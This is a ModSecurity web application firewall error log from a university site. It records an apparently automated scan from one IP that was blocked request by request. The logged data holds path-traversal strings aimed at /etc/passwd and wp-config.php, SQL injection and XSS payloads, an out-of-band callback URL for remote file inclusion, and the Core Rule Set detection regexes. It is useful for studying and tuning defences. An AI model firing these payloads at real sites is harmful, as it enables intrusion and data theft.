[Tue Aug 29 11:48:03.363178 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAjCbNoAAAAB"]
[Tue Aug 29 11:48:04.418901 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAjy55EAAAAG"]
[Tue Aug 29 11:48:04.444498 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hMCo-f0AAAkGCWoAAAAE"]
[Tue Aug 29 11:48:05.406538 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfeb.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAkdu8AAAAAO"]
[Tue Aug 29 11:48:06.404525 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAklewkAAAAD"]
[Tue Aug 29 11:48:06.422110 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAjy55sAAAAG"]
[Tue Aug 29 11:48:07.467724 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAjYrCUAAAAK"]
[Tue Aug 29 11:48:08.376522 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAklew8AAAAD"]
[Tue Aug 29 11:48:09.426938 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAkAL-cAAAAU"]
[Tue Aug 29 11:48:09.458466 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAklexYAAAAD"]
[Tue Aug 29 11:48:11.428156 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAkAMA4AAAAU"]
[Tue Aug 29 11:48:12.354492 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAfWN34AAAAL"]
[Tue Aug 29 11:48:12.460604 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAkksJsAAAAA"]
[Tue Aug 29 11:48:12.770188 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibfeb.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAfWN5EAAAAL"]
[Tue Aug 29 11:48:12.770253 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibfeb.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAfWN5EAAAAL"]
[Tue Aug 29 11:48:17.772182 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAjbw@gAAAAW"]
[Tue Aug 29 11:48:18.418340 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAjbw@4AAAAW"]
[Tue Aug 29 11:48:21.411412 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAkrz6UAAAAC"]
[Tue Aug 29 11:48:21.664665 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAjM7LkAAAAT"]
[Tue Aug 29 11:48:21.696259 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjtc@EAAAAX"]
[Tue Aug 29 11:48:22.472924 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAkqHpgAAAAM"]
[Tue Aug 29 11:48:23.501807 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAjtc@8AAAAX"]
[Tue Aug 29 11:48:23.788587 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gxhioobdttuh83.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gxhioobdttuh83.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14l8Co-f0AAAj12E4AAAAa"]
[Tue Aug 29 11:48:27.866581 2023] [:error] [pid 2359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAk3850AAAAe"]
[Tue Aug 29 11:48:31.506618 2023] [:error] [pid 2385] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAlRkFsAAAAx"]
[Tue Aug 29 11:48:32.353030 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAk7QJYAAAAi"]
[Tue Aug 29 11:48:33.437733 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAkaDHYAAAAJ"]
[Tue Aug 29 11:48:35.347072 2023] [:error] [pid 2350] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAku@k8AAAAQ"]
[Tue Aug 29 11:48:35.351608 2023] [:error] [pid 2382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAlOZIUAAAAu"]
[Tue Aug 29 11:48:36.412989 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pMCo-f0AAAkoTkMAAAAH"]
[Tue Aug 29 11:48:37.426859 2023] [:error] [pid 2350] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAku@lMAAAAQ"]
[Tue Aug 29 11:48:38.403939 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAkksOEAAAAA"]
[Tue Aug 29 11:48:40.441644 2023] [:error] [pid 2414] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAluT0wAAAAe"]
